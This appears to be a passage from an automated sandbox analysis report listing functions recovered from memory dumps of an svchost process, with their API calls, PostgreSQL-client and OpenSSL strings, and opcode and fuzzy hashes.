                                                                                            • Opcode ID: ce1a2626aa9aecc54152972bc7dddfd0e82f25aca7f3464f5780a0f307f8c8c6
                                                                                            • Instruction ID: 8d936a0e350e4ff0487a9faf6f66dbbb95f79c971948ad92f1acc58df948de96
                                                                                            • Opcode Fuzzy Hash: ce1a2626aa9aecc54152972bc7dddfd0e82f25aca7f3464f5780a0f307f8c8c6
                                                                                            • Instruction Fuzzy Hash: 10513D13B0FA9641FA618B2555303796AD3AF59BC4F1D2432DE8D5BB87DE3EE4428308
                                                                                            Function 00007FFDA36DE7C0 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 153COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: malloc
                                                                                            • String ID: %s$NOTICE$out of memory$show password_encryption
                                                                                            • API String ID: 2803490479-452457463
                                                                                            • Opcode ID: 34618062cabeb44f24aa80e125a0ad58118d368cf15b00aa2edb7575cc0e2954
                                                                                            • Instruction ID: 00e53ef0cc652b541facf5e91948d4a709ceb7b4e2803eb70193841472761d52
                                                                                            • Opcode Fuzzy Hash: 34618062cabeb44f24aa80e125a0ad58118d368cf15b00aa2edb7575cc0e2954
                                                                                            • Instruction Fuzzy Hash: E161B062B0AB8182FB508F24E4203A933A2FB45B84F4CA235CB9D5B78ADF3DD145C754
                                                                                            Function 00007FFDA36F1B70 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 149COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: %.*g$0$NaN$e
                                                                                            • API String ID: 3510742995-3571424521
                                                                                            • Opcode ID: c8c38eb258af0969db95de0001370032b05961a9da4f19bd38ba6f788004f7ac
                                                                                            • Instruction ID: 9b565b9efef5307b2334f1bd70f2427076802a94fcaceed37d2a01c00cd2bf1f
                                                                                            • Opcode Fuzzy Hash: c8c38eb258af0969db95de0001370032b05961a9da4f19bd38ba6f788004f7ac
                                                                                            • Instruction Fuzzy Hash: 85512812B0F7D985F6214B666422336BB66AF163D4F182235DD9C32787DE3EE441C708
                                                                                            Function 00007FFDA36D4593 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 115COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID: SELECT pg_catalog.pg_is_in_recovery()$SHOW transaction_read_only$server is in hot standby mode$session is read-only
                                                                                            • API String ID: 1294909896-432320915
                                                                                            • Opcode ID: 33123b8652bb44d5f20823f7633a520aeaafd2d97a6950c8dfaf4a6de7c0019c
                                                                                            • Instruction ID: 61738ffdb46a9cf315620b91084fcf17423c9893547daa23d267d475eb0b4b80
                                                                                            • Opcode Fuzzy Hash: 33123b8652bb44d5f20823f7633a520aeaafd2d97a6950c8dfaf4a6de7c0019c
                                                                                            • Instruction Fuzzy Hash: 7551737270AA8286FB658F2484663F923A6EF00784F5C2135D90D5B396CF7EE9848718
                                                                                            Function 00007FFDA36EE100 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: calloc$free
                                                                                            • String ID: 57P03$n
                                                                                            • API String ID: 171065143-3418334148
                                                                                            • Opcode ID: df8a36cf2ca4682e23dc6e244921621ef3d52e51d2df1f7600a6d424686f4db6
                                                                                            • Instruction ID: 611178c9beed54dd5259dc6d55a0a4186161b3fddffe4c8578ee8930cdc54cdf
                                                                                            • Opcode Fuzzy Hash: df8a36cf2ca4682e23dc6e244921621ef3d52e51d2df1f7600a6d424686f4db6
                                                                                            • Instruction Fuzzy Hash: B6410632B0A7808AFB618F25F4102A977A1FB94B94F1C9635DE8C07795CE3DD09AC708
                                                                                            Function 00007FFDA36D8940 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 83COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00007FFDA36D8970
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00007FFDA36D8A2D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: freemalloc
                                                                                            • String ID: forbidden value %%00 in percent-encoded value: "%s"$invalid percent-encoded token: "%s"$out of memory
                                                                                            • API String ID: 3061335427-1971652480
                                                                                            • Opcode ID: b5fda59a13ad96720057c17624a4485b7a988780e65136f6d646da5fc7088eac
                                                                                            • Instruction ID: b14b996eabbb7c4d93f6e63a944c2bf34a1ef69a8752fe13fde86b7906ce7e27
                                                                                            • Opcode Fuzzy Hash: b5fda59a13ad96720057c17624a4485b7a988780e65136f6d646da5fc7088eac
                                                                                            • Instruction Fuzzy Hash: 9E31C722B0E98689F654C70AE4781BD3363AB01FD4F9C2131D75B2A7C7DF6EA5468708
                                                                                            Function 660164A0 Relevance: 7.6, APIs: 6, Instructions: 52stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpystrlen$mallocstrcmp
                                                                                            • String ID:
                                                                                            • API String ID: 1163645620-0
                                                                                            • Opcode ID: bc562379ad058d026ef46b2cb34c237996dc289eff34b6d50fd7033280173952
                                                                                            • Instruction ID: 1b299b9c5295801d2682b34febc0a98babf209d175e4488603a854c540d1f3c9
                                                                                            • Opcode Fuzzy Hash: bc562379ad058d026ef46b2cb34c237996dc289eff34b6d50fd7033280173952
                                                                                            • Instruction Fuzzy Hash: 0801B1A1A57B5542FE09D7E2BC10756AAD96B897D8F84547ACC1D07300EB3FC591D300
                                                                                            Function 00007FFDA36F14D9 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: DigestInit_exP_md5R_clear_errorR_get_errorR_reason_error_string
                                                                                            • String ID:
                                                                                            • API String ID: 659436333-0
                                                                                            • Opcode ID: ee97c6740920b83cd360bd5c1e9d2dc39d6ad200dea0de58417068c4d7c9a43c
                                                                                            • Instruction ID: 4bdbfdb2156619836bc16e1045deffeea6d697668b2dcaf39e0039cde592e87b
                                                                                            • Opcode Fuzzy Hash: ee97c6740920b83cd360bd5c1e9d2dc39d6ad200dea0de58417068c4d7c9a43c
                                                                                            • Instruction Fuzzy Hash: EBF0E292B0B14242FA005BB295252B951839F44FD4F1C3035ED1EAF3C7DE1EE8818308
                                                                                            Function 00007FFDA36DAF40 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 26stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36D7F57,?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36DAF56
                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36D7F57,?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36DAF70
                                                                                            • strchr.VCRUNTIME140(?,?,?,00007FFDA36D7F57,?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36DAF82
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strncmp$strchr
                                                                                            • String ID: postgres://$postgresql://
                                                                                            • API String ID: 3994671920-2050216600
                                                                                            • Opcode ID: 0e9597235154ecde5574886c21b8962b24524634c221dc6a876f64488a71b7af
                                                                                            • Instruction ID: d731d19733d5ac86e64b0b6d5e04fa4f2cc4e92d19ebda7eb8f9d83afd051258
                                                                                            • Opcode Fuzzy Hash: 0e9597235154ecde5574886c21b8962b24524634c221dc6a876f64488a71b7af
                                                                                            • Instruction Fuzzy Hash: 5BE03981F0B60242FF654F12E86037412426F98BC0F8C7071C80D9A382FE2EE995C719
                                                                                            Function 00007FFDA36DCBF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_strdup
                                                                                            • String ID: "
                                                                                            • API String ID: 2653869212-123907689
                                                                                            • Opcode ID: 5aeb90b271c6664fc04258d622b1bd2f69dad271e385d1d9da99b8cd4f1b751a
                                                                                            • Instruction ID: 37e34d8a6b68569e6feac6140255ecbf237f5537f215e46867a0575932fb86f2
                                                                                            • Opcode Fuzzy Hash: 5aeb90b271c6664fc04258d622b1bd2f69dad271e385d1d9da99b8cd4f1b751a
                                                                                            • Instruction Fuzzy Hash: 6E51C523B0EEDE44FA658E5644202756E92AF46BC0F1CA035DA8D6779BDE2EE441D304
                                                                                            Function 00007FFDA36EC450 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 99librarywindowCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatLibraryLoadMessage
                                                                                            • String ID: (0x%08X/%d)$unrecognized socket error: 0x%08X/%d
                                                                                            • API String ID: 1084892078-2205565054
                                                                                            • Opcode ID: de145a12f0844cdad8b4f501bbe506e818821590bd4b065e55a69a5afb613729
                                                                                            • Instruction ID: 7f4f4f4f9cd2bdf7703293329e49a15382c844ea0634c4d196bcc13a7bc4fd38
                                                                                            • Opcode Fuzzy Hash: de145a12f0844cdad8b4f501bbe506e818821590bd4b065e55a69a5afb613729
                                                                                            • Instruction Fuzzy Hash: 9541F332B0A68185FB208F21E81036A77A2FB44BC8F189139DE5E53792DF3ED499C704
                                                                                            Function 00007FFDA36EE2F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: getnameinfo
                                                                                            • String ID: ???$@%s$[local]
                                                                                            • API String ID: 1866240144-3141298523
                                                                                            • Opcode ID: bbdc047335e87ac93eeb9f9b6f439cd55db21c70df69d9c828b41ba225de72a4
                                                                                            • Instruction ID: 70cddf36983d4030dd91da9fb4f3428b3f12b247ac3ff9d4b140e44619f065a3
                                                                                            • Opcode Fuzzy Hash: bbdc047335e87ac93eeb9f9b6f439cd55db21c70df69d9c828b41ba225de72a4
                                                                                            • Instruction Fuzzy Hash: C131B425B0E78281FB218B1195602B9A792BF05BC0F6C6035DE4D67B87DF3EE5498309
                                                                                            Function 00007FFDA36EB5A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • isprint.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36EB2A4), ref: 00007FFDA36EB5F6
                                                                                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FFDA36EB2A4), ref: 00007FFDA36EB612
                                                                                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FFDA36EB2A4), ref: 00007FFDA36EB669
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fwrite$isprint
                                                                                            • String ID: \x%02x
                                                                                            • API String ID: 1439498453-50714050
                                                                                            • Opcode ID: ccb68a212890eac42810073a9afc4d5fba8638afe558d4672cf4c9783215928b
                                                                                            • Instruction ID: 8fc260293f951839e4cc3b4e90c8974aec2d34bf95864ad6f90e24eb688437bf
                                                                                            • Opcode Fuzzy Hash: ccb68a212890eac42810073a9afc4d5fba8638afe558d4672cf4c9783215928b
                                                                                            • Instruction Fuzzy Hash: 32213732B0A78686FB109F11A95057AB762BB44BD8F0D6130EE492371BCF7EE159C704
                                                                                            Function 00007FFDA36693D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_zallocR_newR_set_debug
                                                                                            • String ID: ssl\record\methods\tls_common.c$tls_prepare_record_header_default
                                                                                            • API String ID: 905617597-2004125817
                                                                                            • Opcode ID: f3dd5f6953c47746d34333d2e5784e37c23bdefd11a8f40233dd4ab326b1767e
                                                                                            • Instruction ID: 737f27c5de0066e97014d43ca22a4acb5bb85348afe407fa5a3a7ed5a825b500
                                                                                            • Opcode Fuzzy Hash: f3dd5f6953c47746d34333d2e5784e37c23bdefd11a8f40233dd4ab326b1767e
                                                                                            • Instruction Fuzzy Hash: 9221B421B0A78282F754DB12E9613AA63D2AF85BC0F1C6431EE4D67B87DF3ED4518714
                                                                                            Function 00007FFDA366D3F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_client_cert_type
                                                                                            • API String ID: 0-640112962
                                                                                            • Opcode ID: d99bbee86aef4951533eb8e45d35e470ddafe6d6836048e86d2aa23eb961aa38
                                                                                            • Instruction ID: 2c02425d34ca8a400c1ca7dc279c17062b0af0e8acc59a39abe56a339e0f75ce
                                                                                            • Opcode Fuzzy Hash: d99bbee86aef4951533eb8e45d35e470ddafe6d6836048e86d2aa23eb961aa38
                                                                                            • Instruction Fuzzy Hash: 8F119D21B0D28242F7149722E6653FA12939B467C8F0C2031EE0C5BBC7DE6EE8918218
                                                                                            Function 00007FFDA3674360 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug
                                                                                            • String ID: ssl\statem\extensions_srvr.c$tls_construct_stoc_session_ticket
                                                                                            • API String ID: 193678381-2390203159
                                                                                            • Opcode ID: 3e759472102663428d332e0c0f1ec7d766e9aceebfea9d6430f504463523da80
                                                                                            • Instruction ID: 531cdd0bdd20e95f10f939c95764b3418aaa3825a54853a1fb470c7c4996fa86
                                                                                            • Opcode Fuzzy Hash: 3e759472102663428d332e0c0f1ec7d766e9aceebfea9d6430f504463523da80
                                                                                            • Instruction Fuzzy Hash: 7B11C621F1A04282F790D726E5667BA62A2EF447C4F8C2531EE0C577D7EE2ED9918604
                                                                                            Function 00007FFDA366E420 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_post_handshake_auth
                                                                                            • API String ID: 0-2821314493
                                                                                            • Opcode ID: bac7bf4fa3fd4e0730eef9842e57bf5e69d3d4d0274f26ca452d69410104372b
                                                                                            • Instruction ID: 26a67bff637fe4d98d14c600a483240285099b7827d5cf039b2735f0e08fbebd
                                                                                            • Opcode Fuzzy Hash: bac7bf4fa3fd4e0730eef9842e57bf5e69d3d4d0274f26ca452d69410104372b
                                                                                            • Instruction Fuzzy Hash: 3B11C261B1904243F7549722E6A13B923A2AF487C4F4C6431EE0C5BBC7DF2ED8918718
                                                                                            Function 00007FFDA3633450 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA3633520: EVP_MD_get0_name.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFDA364E01B,?,?,?,?,?,?,?), ref: 00007FFDA36335A0
                                                                                              • Part of subcall function 00007FFDA3633520: EVP_KDF_free.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFDA364E01B,?,?,?,?,?,?,?), ref: 00007FFDA36335B8
                                                                                              • Part of subcall function 00007FFDA3633520: ERR_new.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFDA364E01B,?,?,?,?,?,?,?), ref: 00007FFDA36335D4
                                                                                              • Part of subcall function 00007FFDA3633520: ERR_set_debug.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFDA364E01B,?,?,?,?,?,?,?), ref: 00007FFDA36335EC
                                                                                              • Part of subcall function 00007FFDA3633520: ERR_set_error.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFDA364E01B,?,?,?,?,?,?,?), ref: 00007FFDA36335FD
